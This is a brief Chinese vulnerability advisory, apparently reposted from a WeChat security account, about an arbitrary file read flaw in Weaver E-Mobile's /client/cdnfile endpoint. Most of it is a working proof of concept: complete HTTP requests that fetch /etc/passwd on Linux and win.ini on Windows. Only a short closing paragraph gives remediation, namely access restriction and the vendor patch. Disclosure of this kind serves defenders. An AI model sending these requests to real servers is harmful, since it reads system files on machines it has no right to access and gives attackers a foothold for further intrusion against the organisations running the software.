/client/cdnfile/C/etc/passwd?linux
/client/cdnfile/1C/Windows/win.ini?windows
漏洞参数:无
漏洞详情:
1、打开自己的服务
2、Windows和Linux系统POC不同,使用POC进行验证
Linux:
GET /client/cdnfile/C/etc/passwd?linux HTTP/1.1
Host: 192.168.3.11:8731
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Windows:
GET /client/cdnfile/1C/Windows/win.ini?windows HTTP/1.1
Host: 192.168.3.11:8731
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
3、漏洞利用成功
接口设置访问权限或限制访问来源地址,如非必要,不要将系统开放在互联网上。
修复方案:
安装升级补丁https://www.weaver.com.cn/cs/mobileDownload.html
原文始发于微信公众号(小羊安全屋):【文件读取】泛微E-Mobile-client/cdnfile
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论